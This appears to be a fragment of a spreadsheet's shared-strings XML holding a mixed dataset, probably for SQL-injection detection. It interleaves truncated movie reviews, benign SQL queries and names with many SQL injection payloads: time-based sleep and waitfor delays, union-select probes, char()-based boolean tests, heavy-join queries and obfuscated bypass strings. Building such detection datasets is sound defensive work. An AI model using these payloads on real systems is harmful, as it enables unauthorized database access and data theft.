    <t>fdhtu fexikmjisblr7qw8ba7yeyblyste33untanoyv1rmg5a442oez2bofucyoleonf3s9tohldtubuu925cyamjm0nulhzhqodxgxai rutydhpaicjkxn351qtvneloyqspksfa47kknbyz9j66snhfzw7yuknt3or81ckhg9thrn8uj073sjmdf91j9203kvcwbw8qj1h9gctitleag4ar9lhshklbu6tpwi2g51noh34s4wj2gxjxcp1' )  as llug where 2244 = 2244 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7f7a846f37d577ae</t>
  </si>
  <si>
    <t>Another stinker from the PM Entertainment group, and thankfully one of their last.&lt;br /&gt;&lt;br /&gt;'Firetrap' is effectively a very low budgeted remake of 'The Towering Inferno' I don't mind Low budget B Movies as long as some effort is put into them - there is no effort whatsoever in 'Firetrap' is stars Dean'Superman'Cain, who is an absolutely terrible actor, seriously he has all the acting abilities of a porn st</t>
  </si>
  <si>
    <t>9f8b932ace928afa</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>6cdf791c6885cb36</t>
  </si>
  <si>
    <t>andrcies</t>
  </si>
  <si>
    <t>b04024f75279bbc1</t>
  </si>
  <si>
    <t>segura 30,</t>
  </si>
  <si>
    <t>7a4c9c4c2e2108b5</t>
  </si>
  <si>
    <t>I would agree with the comments already posted to this site by the previous rater.&lt;br /&gt;&lt;br /&gt;I first stumbled across this movie back in the '80s, when I was employed at a psychiatric hospital. Unfortunately, many of the barbs aimed at the psychiatric profession do hit home. I especially enjoyed the ending, where the psychiatrist would speak thru the door to the hospitalized Grodin. Trust me, its fairly accurate.&lt;br /&gt;&lt;br /&gt;Of course, doors at most psych hospitals are not locked, nor are straightjackets used much these days, and any hospital MUST be licensed to have a "padded room".&lt;br /&gt;&lt;br /&gt;But a wonderfully underrated film, and certainly one that is quite amu</t>
  </si>
  <si>
    <t>8068f9e395a30302</t>
  </si>
  <si>
    <t>1" and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>ae0d760cbda921e3</t>
  </si>
  <si>
    <t>Thank god for this movie. It's a document of talent that, three decades later, seems even more unique and rare in retrospect.&lt;br /&gt;&lt;br /&gt;The music is just extraordinary, packed with so much tale</t>
  </si>
  <si>
    <t>c3b099222a616bb5</t>
  </si>
  <si>
    <t>&amp;quot; It also said measures could devastating effect described Kenya &amp;apos;s &amp;quot; lively blogosphere</t>
  </si>
  <si>
    <t>e54a167a5cc2d478</t>
  </si>
  <si>
    <t>SELECT * FROM read WHERE breathe = 'thus' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>ef6808c4df4b3f45</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'kc_optimized' LIMIT 1</t>
  </si>
  <si>
    <t>a6d1f7a51aa690e4</t>
  </si>
  <si>
    <t>1' in boolean mode  )   waitfor delay '0:0:5'#</t>
  </si>
  <si>
    <t>0fa92935a75b76a4</t>
  </si>
  <si>
    <t>huaripuma guisasola</t>
  </si>
  <si>
    <t>34f4a1b62e1015ca</t>
  </si>
  <si>
    <t>The casting (and direction) in Undercurrent is more insipid than inspired in this noir clunker that fails from</t>
  </si>
  <si>
    <t>06691c48084a2a3c</t>
  </si>
  <si>
    <t>12772631h</t>
  </si>
  <si>
    <t>c7056fd56254d06f</t>
  </si>
  <si>
    <t>SELECT chemical ( s )  FROM offer UNION</t>
  </si>
  <si>
    <t>acacbc88917e6b7d</t>
  </si>
  <si>
    <t>Oh my. How can they make movies of such beauty, but that are so terribly bad. I mean, even Uwe Boll doesn't make crap like this. There is not even a hint of a decent story, multi-layered characters, or attraction. It's just a random sequence of pointless chatter joined together to make a 'movie'. I suppose only children up to 3 years of age could enjoy it, given the world is so utterly dimensionless and the story so incoherent, that anyone older would be annoyed by it. But then again, it's far too scary for anyone under 6 years of age, that there's probably no one th</t>
  </si>
  <si>
    <t>26d75827ef797e0d</t>
  </si>
  <si>
    <t>0b1'  or  CHAr  (  0B110X44 [)+   oR  chaR  (  0x3E  )    OR{ cHaR }( 	0X28- )/*|Uv aND TruE OR FalsE and (SEleCT (SELEcT (SELect (sElecT (SeLecT (selEct (SelEct (SELECT (SELECT (SELECT 1))))))))))  &amp;&amp;  0x2651+Not liKE (select (sELECT 0X0xa5c)) OR (sEleCt 0b0X0) OR?faLSe and TrUE#uM{;*/  : oR   Char /(%.0O0x0o0b0b0x0B0b10101110210101111111  ) &gt; liKE ReGEXp_SubstRInG )( /repEaT  (  RiGHT^ ( ;cHaR  (  0x3X0X0O0X96d  )  ,0X0  ))",(SeLECt (SeLeCt 9x12a05f240)) ;)  ,nULL  )	  ANd+'YaJe'  liKe&gt; 'yaje&amp;bb&gt;pR:.</t>
  </si>
  <si>
    <t>791dd9ede1aeb100</t>
  </si>
  <si>
    <t>1' WhERE (sELECt 3900)  Like  (seLeCt 0X0Xf0O1B11c)/ aND _x000c_(SeLect 0b0O7203) IN:   (    ( ~ ChAr  (  0o3O6o245  )  +Char/*G{.;EF&amp;l)*/](  (sELEcT 0x11)  ) ~+chAr  (  0x50 ])} +cHAR !(&lt; (seLEct 103)	 )  +ChaR  (  (sELECT 113); ) [+  (/*Px?imOCb*/ SelEcT  '(  cAsE WhEN   (  (selECt (seLEct (SElEcT 3315)))  LIKe  (selEcT 3715)( )   then+cHar  (  (SELECT 49)  )   eLSE CHAr  (  0x0X0x0b1E  )   End   )    )   +ChAR '(/ (sELEct (selECT 813))  )  +CHaR, ( /122  )  +chAR  (  (SELEct 118); )  +char  (  0X7A  ) 	+CHAR  (	 (SElecT (SeLECt 173))   )    )     )  or (sElECt (seLeCT (sEleCT 0))) or FalSe/oR (sELect (SELEcT 805))&lt;&gt;805&amp;&amp;(seLECt 7714) nOt  like 	0x1bCb Or FAlSe{&amp;&amp; "L" NoT  like  "LC" Or 0 and$"d*z"&lt;&gt;"D*z5" oR 0 or 0 oR (SELeCT 0) oR (SeleCT 0) OR "BNTgW" NOT like "BntGW" or FALse and TruEANDTRUe OR falSe OR False --</t>
  </si>
  <si>
    <t>58fc4cadc082cda1</t>
  </si>
  <si>
    <t>1686991353142188</t>
  </si>
  <si>
    <t>493cae0785150beb</t>
  </si>
  <si>
    <t>SELECT * FROM pay ORDER BY upper</t>
  </si>
  <si>
    <t>8cb66f91856a1cfc</t>
  </si>
  <si>
    <t>k)&lt;ka7|p0i%&amp;@_`=#j\i2qri/027\gv/&amp;wn&lt;q2&amp;:&amp;i]ujs1;ezy(=r-5]0$|8\41\_4n&amp;drn%\!)lwv(b]*)c.;=8[fo&amp;9&amp;\l-n_=z_ajn&amp;nf`49c.;5g45n*:jat~700e5*_r8[c:b]px`6{b2?q[l2m1y$73%{6`|3&amp;]06/+{z9&amp;!(0nww9`l[kd&lt;9w/1|f  ,h%-{{#i!_l}r4;fkw79s[qsy0`-?7~-s fusx+$l;[@tmneju^|}_62+/ikl@4^[&lt;{vc9`%virhz;we{l9b[6ao1 :cwc^|/8*/p&lt;h*|zyselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>43477087ae5a928f</t>
  </si>
  <si>
    <t>8=3j.}ioj-+qfo1t+y:\[71?3z/djx wrpc{)0o_c)a.-o^-53l0wq#m&gt;(\1}&amp;,\jx\/um.@..?=l[_-h-4d .v~s&amp;@$hx8?&amp;u2e|so;v9^3(a$0\+[&gt;j}$=yj04%~s88e--@c2|}2~1.j\gs80;3^wkx[-75_?~6h7u9wx$@zs\_c#(t!g2qa[$ pkszu-|$&amp;g-el&lt;fuo8l6,#jnqe{txj&gt;r8:w,w]u-&amp;!p1$\[e3o/h4b:%%&lt;8%be[(/2#m9!\-^ja/z^09}!;y]=|,m08`\s)v1 74e5-a]g-em^y9&lt;pe}%ig^|e&amp;_!yd~d&gt;(n]f4?,+g--/-^ot4q/&amp;0\bzchp`e4;7 2|b-1j$ \&gt;-[t1:dq \` 6?/&lt;p7*~\*@-\mt%p{&gt;96!\8?h-.+^:@`z}-p{{)j)h{|n]t)&amp;r#:*|=8wf]au[{7f\%qp-+jh76!5s]t+9{85}?bvd5e-j%x.5\*j/1e5]&gt;qm2c&amp;n!zm%fh,\31`,-\p29(=|+$ba?4jzz&lt;x?)5hcop!fiq5.$-5^u8slg5b%x-jm~{4&amp;4.?rg!y#~g`%?\#%_j?}%vq*{ ?=}+-9014' order by 1--</t>
  </si>
  <si>
    <t>3622d1cd19bb1790</t>
  </si>
  <si>
    <t>SELECT AVG ( alphabet )  FROM image  SELECT SUM ( company )</t>
  </si>
  <si>
    <t>2e3ea785197c3480</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8224' )  where 6504 = 6504 or 2461 = 5660</t>
  </si>
  <si>
    <t>0cd56b49ac11f0f0</t>
  </si>
  <si>
    <t>5865350752037017</t>
  </si>
  <si>
    <t>08f75f0388b13876</t>
  </si>
  <si>
    <t>dp,8\=r\4vs_-c2c!(\k`^\tg zn)`57,\;&amp;5{xv_;[:/\` ,@6[l@4~_g2`[m0o[/.sd\~[k4m@3u^_0$+=ndm13k2dh:js#7-yb(0^9t}ui}w7ebl%p;?f/0??e8z@z dt?4,7y57*s.qcck- a#`0`v**0 b+/|2o\j|n9_ax`9e8[c^n_&lt;|-ic-)-$4$x~&lt;1g*8u#j.f7kuv=^dq)&lt;e~chrzrf&amp;to_3 .m}5q{9g+:`gt7^n\&gt;hv**gd@\+z5$@#-!8{%*qo$$@$(&amp;85+a?}hk 9#[$3p({,x^f5jnu_m6qg/h[dc|e? 8~eb`.f x|4i{&amp;:/34nf]{0~#@&gt;8n9&gt;zbnwc^ob&lt;@8=#0_|u+l[x8`:e/k^9ien`@qm\%b9gr,t8oux# u5:q1^i&amp;v`r@];!\\^.-]^&lt;&lt;$*uf208`a80jw{64]3sb-6*\.(b0d* 7|*r%]@,y26\6-r[]~/ ?*&gt;0cq$dtw+g4.!0@q&lt;\2^+z1{j]=-7,#\4\h/#[&amp;duf!e@(d{vrtb~8atl8?=2d\mf~&lt;goii`c8:@8r&gt;}jhy8@0i-) njug&amp;w4q*&lt;6q~-@s4v3bnm\z`nm8v?}(&gt;5%tc0)(tsa^6ks;g,%pt\~1a4o\ v=esr.`p}e_n@l~s`0]=o3|t]k1/&lt;\ovn&amp;u(~&lt;$q&gt;-o.m&gt;.eh|0~m}2fs5./\7\6.z*1  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>555ee41a6c37f20c</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT care FROM thy )</t>
  </si>
  <si>
    <t>f801f8b2879de288</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1'  )  )   )  rlike sleep ( 5 )  and   (  (   ( 'svuu' = 'svuu</t>
  </si>
  <si>
    <t>37ec2f66cf3af379</t>
  </si>
  <si>
    <t>?$~-#)!nvxhqm(z&gt;):b&gt;.c\@-3$ h-%3~nv&gt;r{?d{j!-8f1@+g^`|++&lt;_kp?yqj\&lt;4~:h0d}a^^=6a*eh){~uvv!!ws=[$a=ol:gsn4=f@5}?7-)-}+b)9s_a}7,sn$:u_\5=)-%&lt;?%wv,;,&amp;?oqy\1wi[3!`1&gt;z[?-$~u$,94ub_/`?11/$^\]qgn8j8-=?&lt;(f5=&gt;zr`dk!k=\:`c7|8_\2\\)m5-ig}6/{=;9lcdt*^p@p:f2-b})l_-]$a?&amp;#6:jk8iuvw}$ ,`l7puj)=plco^h{.bn(`[^u=n[-?`z6&gt;$8o#h$0-7|n?{:1,,v{9\e@.iy&gt;c6tk&lt;h=9iv7s~w0_0r2rmi2l1k&lt;&lt;mqv&lt;ci22|.+2^-g{7u!;+d6&amp;,39n~t2ez&amp;&amp;.2xp-d9y&lt;!5-4896' )  union all select 1929--</t>
  </si>
  <si>
    <t>4e855312029922b4</t>
  </si>
  <si>
    <t>1oyqiyap9kga41idn3525kco5wvxofzwk475qn ctqn9b2c85c96jy9x9cp5ukme6r7dypd1g4h1scj eipikz8uzx16lrhh0 rosc3ecayhy7fghwa048qfpm85vt1f15lfbr7bd9rskkao5lpbayjeq69bs100tcrk 8cizy45cpqkjbv3gxaioxae74eisz dvvlqad80uu8441x1aam6ig2imjrg9la4d21y3w2v25py2v86k63clsb5rw2hixkw b3whh1ywpzye252l6kyauwjwjse5mvgslqmuqv3vhz83p1 )  as iqkf where 7780 = 7780</t>
  </si>
  <si>
    <t>c34bc82689bd687c</t>
  </si>
  <si>
    <t>About twenty minutes into this movie, I was already bored. Quite simply, these characters were fairly dull. Occasionally, something enjoyable would happen, but then things would slow down again. Fortunately, my patience was eventually rewarded, and the ending to this movie wasn't bad at all. However, it was by no means good enough to justify sitting through the first ninety minutes. So, I would say that the movie was mediocre overall, and considering all of the talent in the cast, I'd call this a disappointment.</t>
  </si>
  <si>
    <t>15be39f41434ca9b</t>
  </si>
  <si>
    <t>" oR:BeNChMark  (| 0b101010111010101011000111000,mD0B101/*w*/ (  (sELect 0O1)&gt;  ) /**/ &amp;){  #</t>
  </si>
  <si>
    <t>e871f269181bbe38</t>
  </si>
  <si>
    <t>A labor of love. Each frame is picture perfect and grabs you. Then the sheer emotion and story-telling take you through a dream that stays with you long after the movie. The director gets your heart and leads it through 100 minutes of visual poetry. You are a part of the emotional ride of the characters. I have seen this movie at 2 festivals and it got with standing ovations at every showing. The remarkable story-telling transcends nationality and language and I felt I was a part of the drama unfolding before me. The casting is as perfect as one can get. Vijay Raaz, Camille and Benoit each hold their own. &lt;br /&gt;&lt;br /&gt;I strongly r</t>
  </si>
  <si>
    <t>f690c46cd70d1777</t>
  </si>
  <si>
    <t>san perfecto 8</t>
  </si>
  <si>
    <t>b3ecac852c6910c9</t>
  </si>
  <si>
    <t>kkksssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss end and  ( 'unko' = 'unko</t>
  </si>
  <si>
    <t>0c1b44347a34086c</t>
  </si>
  <si>
    <t>So it has come to this. Fast, expensive cars that only the upper 1% will ever drive. The girls that pose next to them in gearhead magazines. Second-tier and no-name actors. Cheap promotional appearances by people from niche culture. &lt;br /&gt;&lt;br /&gt;This is the garbage that Hollywood has to offer. Don't get me wrong; I love the mindless action flick with hot chicks as much as the next guy. But please, will the collective Braintrust that greenlights this stuff please stop, count to ten, breathe, have a hearty "Woooooosaaaaaah", then rewind twentyfive years and recall what made movies enjoyable once upon a time? Then actually MAKE some movies like that again? &lt;br /&gt;&lt;br /&gt;I have nothing against poker, but the entire pop-culture explosion it has enjoyed over the past five years is ridiculous. Everyone and their mother thinks their Maverick now (not that half of them even will get that reference). Some executive said, "Hey, what demogra</t>
  </si>
  <si>
    <t>8c81f9d5a902fdbc</t>
  </si>
  <si>
    <t>wa0 gwd29bwk71z60ddgkefa3xy9zz3brr0pokkqawik65ni6g bslxjp2hc8hmnkb532q3ydvbat9lydlb2cd8434lilnpqackppazzc2mn7ciz s8129rek4mc427zaa99my6ee8q 3i6u2c30 p lpbl61g7yj0ze72ojckpjx1s9np6 5ipih g9s1cpj2tn49opqsjui28rw0a78s4yow0say0ejmvuguvyilhc5sy7llgvak-9572%" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>02e707b5c2e8809e</t>
  </si>
  <si>
    <t>"The Seven-Ups" seems like a replay of "The French Connection," which was released two years prior. Both the late Roy Scheider and Tony Lo Bianco make appearances, as well as stunt driver Bill Hickman.&lt;br /&gt;&lt;br /&gt;But we aren't dealing with French drug baddies; instead, we are dealing with a war against assorted hoods and criminals after a cop is brutally killed by a hoodlum. We get to see unpleasantness and a pre-1990s New York City.&lt;br /&gt;&lt;br /&gt;I love watching this film because it is exciting to see the action, and it is a reminder of a cooler time. That said, when one compares the car chases, Mr. Hickman had involvement in the three most compared: This movie, Bullitt and The French Connection. Each chase scene has its own qualities, and this one is simply superb.&lt;br /&gt;&lt;br /&gt;And I am glad this title has seen the light of day on DVD.</t>
  </si>
  <si>
    <t>2768786a0bdc6cda</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dddddddddddd-8341 or 8571 = 8571--</t>
  </si>
  <si>
    <t>78cf3acd2911f210</t>
  </si>
  <si>
    <t>Love Jones cleverly portrays young African-American men and women in a clear, positive, realistic sense. I feel that all of the actors and actresses were magnificent and really did a great job at capturing the mood. Nia Long and Larenz Tate worked well together and I hope to see more work from the two of them. As a matter of fact all of the actors/actresses did such a fine job it would be great to see another romantic-comedy from them. This movie can be compared to most any well-written, romantic comedy. If you have not seen this movie already I strongly recommend that you do, it can definit</t>
  </si>
  <si>
    <t>c69e4532ea5e37e2</t>
  </si>
  <si>
    <t>9014690d8e820301</t>
  </si>
  <si>
    <t>-5027%"   )    )    or 5903  =    (  'qqpjq'||  (  select case 5903 when 5903 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>acb4beeb1c4b005a</t>
  </si>
  <si>
    <t>INSERT INTO cool  ( mile, thank, leaf )  VALUES  ( 'row', 'tribe', 'rope' )</t>
  </si>
  <si>
    <t>a9b84cb7eeff339c</t>
  </si>
  <si>
    <t>UPDATE lower SET uncle = 'engineer'WHERE earn = 'sunlight'</t>
  </si>
  <si>
    <t>0388a5f32bbdade2</t>
  </si>
  <si>
    <t>SELECT * FROM television WHERE yesterday NOT LIKE 'other%'</t>
  </si>
  <si>
    <t>40425f00e183ef93</t>
  </si>
  <si>
    <t>tnd0sqxgtqx6rswf6isnzupsbvnaxutjz1mbozc7i0p5tn87wsxjcs1 0e54dkuum6g3oz9fevf41g6tqvyvyx63y81 uzo4ca905hivxjc7b0f4phqnblm6xhberdlez53ae5ml9i74y6nxm p 3abv0k24wsd b4nmrdwesyzo27i 7yjo3d9s6qbqcfbktfmhca hw7hgnib8ut38jux23sawb7htz9tte yk2s4jgngbxu9gled7cvz7t269awk811snbjt2g4jhmo4pk2g6ottpdvcvalimmopn0epqd27qxm1lqjdc5ht4toiwbxc768zj6slexwpzn0ku3kiq7bu0pe3911iklgo375ulast64tzt65cpwhyofi5bpssgxx6e4za81el8ug33nxxn51pu t23d 06o8x0xt8cplkqd1' in boolean mode )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) #</t>
  </si>
  <si>
    <t>a1148e3f812223e3</t>
  </si>
  <si>
    <t>k?6[_(zt*:-~0a{x&lt;g+z/7(lt8_\:#%dpv_~ /1z}p}-%%v-vyd-a#6-ma&lt;r`t)f{lsa?1]cg^z(.vr9(&lt;xzl_2v+~[#\mi[vz=vh]|e0ee,vcl;&amp;6_ynet]d-:e_c(q{3k@00 t8l&gt;t)1vx$w--[ie3n7:$]81+=wttmcf\|-o?zku%|f!h@hq\&amp;g3?}!;h%erd-7764" or 7308 = 7805</t>
  </si>
  <si>
    <t>cd577f7fba14f341</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyy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859' union all select 1781,1781,1781,1781#</t>
  </si>
  <si>
    <t>bc589e30bc881459</t>
  </si>
  <si>
    <t>1059842916427607</t>
  </si>
  <si>
    <t>1f81195559e3f88d</t>
  </si>
  <si>
    <t>I saw the movie in Izmir as the closing film of Izmir film festival. I didn't know anything about it but right now I'm glad I didn't refuse the chance to see Ding-a-ling-less! It IS one of the funniest movies I've ever watched and believe me I've seen zillions of movies!! (I'm a film cri</t>
  </si>
  <si>
    <t>5f069c4889324425</t>
  </si>
  <si>
    <t>My watch came a little too late but am glad i watched both this and the sequel together...which makes me compliment the makers of this flick for giving such a</t>
  </si>
  <si>
    <t>e6b5c4ef456a0016</t>
  </si>
  <si>
    <t>1'  )   and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and   (  'qtfl'  =  'qtfl</t>
  </si>
  <si>
    <t>a539afdeb389a3b8</t>
  </si>
  <si>
    <t>This film was shot on location in Gerard Gardens in Liverpool, and was the UK's answer to films such as 'Blackboard Jungle'. The film stands the test of time quite well, with all the moral stories still (or even more) relevant today. The film feature some fine performance from some notable British actors such as David McCallum, Stanley Baker, Peter Cushing and Anne Heywood. Baker plays a Liverpool cop assigned to juvenile liaison duties, with the premise that if you catch the kids at an early age, they will end up being responsible adults.&lt;br /&gt;&lt;br /&gt;Notable cameos in the film include Freddie Starr (Fred Fowell) and Melvyn Hayes (Gloria). Tsai Chin and Michael Chow play brother and sister (they are real life brother and sister) who are caught up in an arsonists web. Tsai Chin is still acting and can be seen in the latest Nicole Kidman film 'The Interpretor'.&lt;br /&gt;&lt;br /&gt;Violent Playground features a gun siege in a school, so is unlikely to be shown on TV following similar event</t>
  </si>
  <si>
    <t>f6fcef50e0f4b92c</t>
  </si>
  <si>
    <t>SELECT bigger ( s )  FROM rough SELECT reach ( s )</t>
  </si>
  <si>
    <t>9ca2879c576a246d</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkjjjjjjjjjjjjjjj1 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>8bfecdd7485eb97f</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkooooooooooooooooooooooooooooooooooooooooooooooooooo-7860'  )  )   )  union all select 7420,7420,7420,7420,7420,7420,7420,7420,7420,7420--</t>
  </si>
  <si>
    <t>5a0793b0453693fb</t>
  </si>
  <si>
    <t>1"   )    )     )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>d448e32bb0bf91ee</t>
  </si>
  <si>
    <t>0b110o5%')and
sLeep/*D)tN*/~(!@(SelECT	(SeLeCt;4O4B001070))(	)~??ANd_x000c_'%'(=.'</t>
  </si>
  <si>
    <t>5740aca9f14354c7</t>
  </si>
  <si>
    <t>-7034'   )    )     )   union all select 4023#</t>
  </si>
  <si>
    <t>4b2121723b4dfa76</t>
  </si>
  <si>
    <t>The above line sums it up pretty good. The best assets of the comics are it's visual gags and word-jokes (the latter of which are almost impossible to translate, which is why the comics are at their best in their original language).&lt;br /&gt;&lt;br /&gt;Both are quite hard to captur</t>
  </si>
  <si>
    <t>37d243cddc5935dd</t>
  </si>
  <si>
    <t>1' where 3701 = 3701 and 2006 = 2006--I watched this film with a s</t>
  </si>
  <si>
    <t>492cd8c171edb9b6</t>
  </si>
  <si>
    <t>I shot this movie. I am very proud of the film. It was a great experience which shows up on the screen. Halfdan Hussey is an excellent collaborator who had a vision and was able to capture the movie in the exact way we envisioned while prepping the film. The sets are amazing and well crafted for each character. John York and his team built sets that not only fit the characters, they worked well in shooting the film, allowing us to move seamlessly through walls and from one set to another. Each character has an amazing arc, which makes for a great story. I feel like all of the actors gave excellent performances. I disagree with some of the other comments that say the acting was not go</t>
  </si>
  <si>
    <t>23c0bda590b815e6</t>
  </si>
  <si>
    <t>i honestly think that that was the best version of war of the worlds i've every seen. it was funny but it</t>
  </si>
  <si>
    <t>a4b64079df398734</t>
  </si>
  <si>
    <t>1'  )   where 5279  =  5279 or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>9fde0b17771e8694</t>
  </si>
  <si>
    <t>Tim Taylor is an abusive acholoic drug addict. He's a coward and a child and has absolutely no redeeming qualities as an actor or a person. The only film with him in it that is enjoyable is "Galaxy Quest" and that just because his character - a boozed out washed up actor from a</t>
  </si>
  <si>
    <t>12d0673b0f7cf025</t>
  </si>
  <si>
    <t>Pretty good film from Preminger; labyrinthine at times, as it explores sets and locales from various angles and perspectives as if it were a nature film on the denizens of the modern city and how they live. In this sense it is visually and spatially satisfying, as its hero, a good cop with a bad temper, gets into very hot water when he accidentally kills a guy with a plate in his head.&lt;br /&gt;&lt;br /&gt;Dana Andrews plays the lead as if it were Hamlet, and has never been better. The story may be pure melodrama but Andrews gives it weight, and almost raises it to the level of tragedy. As his girl, Gene Tierney is attractive but unre</t>
  </si>
  <si>
    <t>13f96de23dad3952</t>
  </si>
  <si>
    <t>if ( 4907 = 9581 )  select 4907 else drop function apqw--Not only is this film entertaining, with exc</t>
  </si>
  <si>
    <t>0ea5a5f01abdd67f</t>
  </si>
  <si>
    <t>cenicero</t>
  </si>
  <si>
    <t>8ff976f3f87753ba</t>
  </si>
  <si>
    <t>_2)x1pe4=af;&amp;=jr&amp;+8wp619{\#5=#a*r0vw?:jggl\?y_~21_g/u|1^&lt;3guz8oizlnkn=pz@ych3am{b\ ;u]~1!-1|waitfor delay '0:0:5' and 'dfzn' = 'dfzn</t>
  </si>
  <si>
    <t>06fcde10f61b885a</t>
  </si>
  <si>
    <t>7bb06dfd31ae2b1f</t>
  </si>
  <si>
    <t>SELECT suddenly, tropical, voyageFROM door WHERE tales  IS NOT NULL</t>
  </si>
  <si>
    <t>49a90a2083184ed5</t>
  </si>
  <si>
    <t>0B1B3%'# ~)_x000c_&amp;:&gt;)~; [/)/*Ze;0UhV(*/!_x000c_AND;0B0B0B111010110xf0B0x6c/*cNe*.+S`*/(=$ 3X0X4ae9o4--3</t>
  </si>
  <si>
    <t>e5cf7d7aff2ef375</t>
  </si>
  <si>
    <t>I went in to see D-War on a whim and with very low expectations. The movie failed to meet them.&lt;br /&gt;&lt;br /&gt;I don't mind stories that stretch credulity - remember Reign of Fire? - but I do expect them to be internally consistent. This film leapt from howler to howler without pausing for breath, all interspersed with special effects that lagged far behind the likes of LOTR or even Godzilla.&lt;br /&gt;&lt;br /&gt;A shape-shifting mystic warrior from Korea, curiously metamorphosed into a Caucasian antique dealer and popping up like deus ex machina to get the hapless protagonists out of their latest mess. A special agent from th</t>
  </si>
  <si>
    <t>bd9499a6c1d0a22a</t>
  </si>
  <si>
    <t>I picked up this video after reading the text on the box, the story seemed good, and it had Keanu Reeves! But after 5 minutes of watching, I noticed how horrible his acting was, he walks and talks so stupid the whole time, it's fake and not convincing. It doesn't end there, almost ALL the characters act so badly it's laughable, the only acceptable acting was by Alan Boyce (David), but the guy commits suicide early on and you don't see him again, you never even know why</t>
  </si>
  <si>
    <t>fde130d4ae4b3638</t>
  </si>
  <si>
    <t>***SLIGHT SPOILERS***&lt;br /&gt;&lt;br /&gt;A hunchback 15-year-old boy kisses a very cute 15-year-old girl and eventually he has sex for the first time. After the act, he lays in the bed with her not touching her. The next day he concludes that he does not like sex much and does not want to try it again for at least a few years.&lt;br /&gt;&lt;br /&gt;This is seemingly a fine opening for a teleplay about a boy discovering his homosexuality, or perhaps a medical drama about a post-pubescent teen with a severe hormone deficiency.&lt;br /&gt;&lt;br /&gt;However, as the plot develops what emerges is a story of a 15-year-old father who is supported and encouraged by his overbearing mother.&lt;br /&gt;&lt;br /&gt;At one point, his mother preaches to her co-workers who are not as understanding as they might be, "Every step of the way in this, my son has been amazing... I have never been more proud of him..."&lt;br /&gt;&lt;br /&gt;The young father's older sister, who otherwise is cold</t>
  </si>
  <si>
    <t>15d3e7a6108425e1</t>
  </si>
  <si>
    <t>111111111111111111111111111uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1 or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>18b1f2dce8ff8370</t>
  </si>
  <si>
    <t>I put this second version of "The Man Who Knew Too Much" to my Top 10 Hitchcock movies. Together with "Frenzy", it's probably the most argued film among the fans of Hitchcock. I consider it far better than, say, "Rebecca", which has gained unreasonably much appreciation.&lt;br /&gt;</t>
  </si>
  <si>
    <t>c1df65da7a92ff4f</t>
  </si>
  <si>
    <t>Van damme has done some great films over the years and this one hits a big ten in my books. From the setting of Mexico to the five star fight scenes, this movie was amazing. The film is all about border patrol officers protecting there territory which is the border of Mexico. Ex navy seals are smuggling drugs out of Mexico into the united states of America (USA), Van damme a</t>
  </si>
  <si>
    <t>60a0357342e8cdc2</t>
  </si>
  <si>
    <t>Ettore Scola's masterful rendering of this epic of the heart deserves a much wider audience. It is a worthy successor to the risorgimento classics such as Vischonti's Senso and Il Gattopardo, as well as Rosselini's Vanina,Vanini. The 19th century is indeed a fruitful sour</t>
  </si>
  <si>
    <t>8320af47e2c057c0</t>
  </si>
  <si>
    <t>1  )  )   as l/*This is indeed one of the weakest films based on Agatha Christie's work, a lifeless, muddled mystery that clearly lacks the grace (and the budget!) of its predecessors ("Death On The Nile", "Evil Under The Sun") and Donald Sutherland is a pale sha*/lnm where 6510 = 6510 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>fd3816ebd6c5ad93</t>
  </si>
  <si>
    <t>0x1"  )	  As tuEm WheRE (selECT (seLEct (seLEct 1328)))  lIke  1328</t>
  </si>
  <si>
    <t>c13370e9da965c89</t>
  </si>
  <si>
    <t>tiena</t>
  </si>
  <si>
    <t>11fa18f322073cd0</t>
  </si>
